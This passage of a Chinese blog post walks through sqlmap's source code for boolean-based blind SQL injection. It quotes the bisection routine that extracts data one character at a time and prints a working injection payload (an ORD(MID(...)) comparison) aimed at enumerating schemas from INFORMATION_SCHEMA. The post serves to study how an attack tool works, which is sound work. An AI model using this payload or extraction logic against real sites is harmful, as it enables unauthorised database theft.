outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
这里的 expression, expressionFields, expressionFieldsList, payload分别是
SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA
COUNT(DISTINCT(schema_name))
['COUNT(DISTINCT(schema_name))']
user=__PAYLOAD_DELIMITER__user1' AND ORD(MID((%s),%d,1))>%d AND 'fQbM'='fQbM__PAYLOAD_DELIMITER__
追过去,发现做了基本的处理
def _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
outputs = []
origExpr = None
for field in expressionFieldsList:
output = None
if field.startswith("ROWNUM "):
continue
if isinstance(num, int):
origExpr = expression
expression = agent.limitQuery(num, expression, field, expressionFieldsList[0])
if "ROWNUM" in expressionFieldsList:
expressionReplaced = expression
else:
expressionReplaced = expression.replace(expressionFields, field, 1)
output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field)
if isinstance(num, int):
expression = origExpr
outputs.append(output)
return outputs
里面payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field分别为
user=__PAYLOAD_DELIMITER__user1' AND ORD(MID((%s),%d,1))>%d AND 'yejJ'='yejJ__PAYLOAD_DELIMITER__
SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA
2
None
None
False
COUNT(DISTINCT(schema_name))
追溯到注入逻辑
def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
多线程的判断
if numThreads > 1:
if not timeBasedCompare or conf.forceThreads:
debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else ""))
logger.debug(debugMsg)
else:
numThreads = 1
if conf.threads == 1 and not timeBasedCompare and not conf.predictOutput:
warnMsg = "running in a single-thread mode. Please consider "
warnMsg += "usage of option '--threads' for faster data retrieval"
singleTimeWarnMessage(warnMsg)
当然这里是单线程的
while True:
index += 1
charStart = time.time()
# Common prediction feature (a.k.a. "good samaritan")
# NOTE: to be used only when multi-threading is not set for
# the moment
if conf.predictOutput and len(partialValue) > 0 and kb.partRun is not None:
val = None
commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(partialValue, asciiTbl)
# If there is one single output in common-outputs, check
# it via equal against the query output
if commonValue is not None:
# One-shot query containing equals commonValue
testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False)
query = kb.injection.data[kb.technique].vector
query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (expressionUnescaped, testValue)))
query = agent.suffixQuery(query)
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
# Did we have luck?
if result:
if showEta:
progress.progress(time.time() - charStart, len(commonValue))
elif conf.verbose in (1, 2) or hasattr(conf, "api"):
dataToStdout(filterControlChars(commonValue[index - 1:]))
finalValue = commonValue
break
# If there is a common pattern starting with partialValue,
# check it via equal against the substring-query output
if commonPattern is not None:
# Substring-query containing equals commonPattern
subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern))
testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False)
query = kb.injection.data[kb.technique].vector
query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (subquery, testValue)))
query = agent.suffixQuery(query)
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
# Did we have luck?
if result:
val = commonPattern[index - 1:]
index += len(val) - 1
# Otherwise if there is no commonValue (single match from
# txt/common-outputs.txt) and no commonPattern
# (common pattern) use the returned common charset only
# to retrieve the query output
if not val and commonCharset:
val = getChar(index, commonCharset, False)
# If we had no luck with commonValue and common charset,
# use the returned other charset
if not val:
val = getChar(index, otherCharset, otherCharset == asciiTbl)
else:
val = getChar(index, asciiTbl)
这里的val就是每次注入的一个字符,这里比较重要的就是val = getChar(index, asciiTbl),这里index为第几位,asciiTbl则为可能的ascii表
对于数字和字符有不同的ascii表
数字
[0, 1, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57]
字母
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127]
二分法,首先定义最大最小字符
maxChar = maxValue = charTbl[-1]
minChar = minValue = charTbl[0]
进入循环,构造payload,每次取中间的那一位len(charTbl) >> 1
tion = (len(charTbl) >> 1)
posValue = charTbl[position]
falsePayload = None
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER))
else:
# e.g.: ... > '%c' -> ... > ORD(..)
markingValue = "'%s'" % CHAR_INFERENCE_MARK
unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue))
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL)
二分法需要两个payload,然后发起请求
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
如果result是ture,那么当前值设置为最小值,前面所有值去掉,false同理
if result:
minValue = posValue
if type(charTbl) != xrange:
charTbl = charTbl[position:]
else:
# xrange() - extended virtual charset used for memory/space optimization
charTbl = xrange(charTbl[position], charTbl[-1] + 1)
else:
maxValue = posValue
if type(charTbl) != xrange:
charTbl = charTbl[:position]
else:
charTbl = xrange(charTbl[0], charTbl[position])
这样最多7次,就可以确定其中一位了
时间盲注逻辑相同…
由于python水平还是有限,这次读源码就到这里了,有机会在深入读吧
原文作者:LoRexxar
原文作者博客:https://lorexxar.cn/
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 787772394@qq.com
文章标题:SqlMap源代码阅读分析
本文作者:二豆子·pwnd0u
发布时间:2020-01-13, 21:42:31
最后更新:2020-01-13, 21:43:55
原始链接:http://blog.codefat.cn/2020/01/13/SqlMap%E6%BA%90%E4%BB%A3%E7%A0%81%E9%98%85%E8%AF%BB%E5%88%86%E6%9E%90/版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。